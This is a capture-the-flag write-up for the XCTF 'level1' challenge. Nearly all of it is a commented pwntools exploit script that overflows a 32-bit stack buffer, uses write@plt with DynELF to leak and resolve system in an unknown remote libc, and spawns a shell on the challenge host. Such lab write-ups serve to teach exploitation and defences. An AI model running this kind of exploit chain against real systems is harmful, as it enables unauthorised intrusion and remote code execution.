xctf攻防世界


    #-*-coding:utf-8 -*-
# Write-up script (Python 2: `print` statement, raw_input) for the "level1"
# challenge: a stack overflow in a non-PIE 32-bit binary (the fixed 0x0804xxxx
# addresses below), driven with ret2plt and pwntools' DynELF because the
# remote libc is unknown. The comments note what each step relies on and
# which mitigation would have stopped it.
import pwn
from pwn import *
#pwn.context.log_level = 'debug'
#context(arch = 'i386', os = 'linux')
#shellcode = asm(shellcraft.sh())#generate shellcode directly with shellcraft.sh()
#asm
#io = process('./level1')
# Remote service given by the challenge; the commented process() line above
# is the local equivalent for debugging.
io = remote('111.198.29.45', 52614)
elf=ELF('./level1')
# PLT entries and .bss are read from the binary. Without PIE they are the
# same on every run, which is what makes a hard-coded chain possible; PIE
# would randomize every address used below.
write_plt=elf.symbols['write']
write_got=elf.got['write']   # not used below (DynELF performs its own reads through leak())
read_plt=elf.symbols['read']
bss=elf.bss()
start=0x08048380   # presumably _start: returning here re-runs the program so leak() can be called repeatedly — TODO confirm
main=0x080484B7    # not used below
def leak(address):
    # Leak primitive handed to DynELF: returns the 4 bytes at `address`.
    # The overflow (0x88 bytes plus 4 — presumably buffer plus saved ebp, TODO
    # confirm against the disassembly) overwrites the return address with
    # write@plt; the fake frame is write(1, address, 4) with `start` as the
    # address write() returns to. A stack canary would abort here before the
    # overwritten return address is ever used.
    payload='a'*(0x88+4)+p32(write_plt)+p32(start)+p32(1)+p32(address)+p32(4)
    #io.recvuntil("?\n") #local and remote differ here, take note!
    io.send(payload)
    leaked=io.recv(4)
    print "[%s] -> [%s] = [%s]" % (hex(address),hex(u32(leaked)),repr(leaked))
    return leaked
# DynELF resolves `system` inside the remote process by walking its memory
# through leak(), so no libc copy is needed. Each lookup costs many round
# trips of 4-byte reads — from the service side, that burst of restarts and
# reads is the observable signature of this stage.
d=pwn.DynELF(leak,elf=ELF('./level1'))
system=d.lookup('system','libc')
print hex(system)
print
print hex(bss)
# Second stage: read(0, bss, 8) stores the command string in .bss, returns to
# 0x08048549 (presumably a gadget that discards the three arguments — TODO
# confirm), then system(bss) with 0xdeadbeef as a dummy return address.
payload2='a'*(0x88+4)+p32(read_plt)+p32(0x08048549)+p32(0)+p32(bss)+p32(8)
payload2+=p32(system)+p32(0xdeadbeef)+p32(bss)
raw_input()   # pause so a debugger can be attached before the final payload is sent
io.sendline(payload2)
io.send('/bin/sh\x00')   # exactly 8 bytes, matching the read() length above
io.interactive()

    本来是个简单的题(程序给出了buf地址),但是远程程序不一样,直接变成了无libc的PWN。
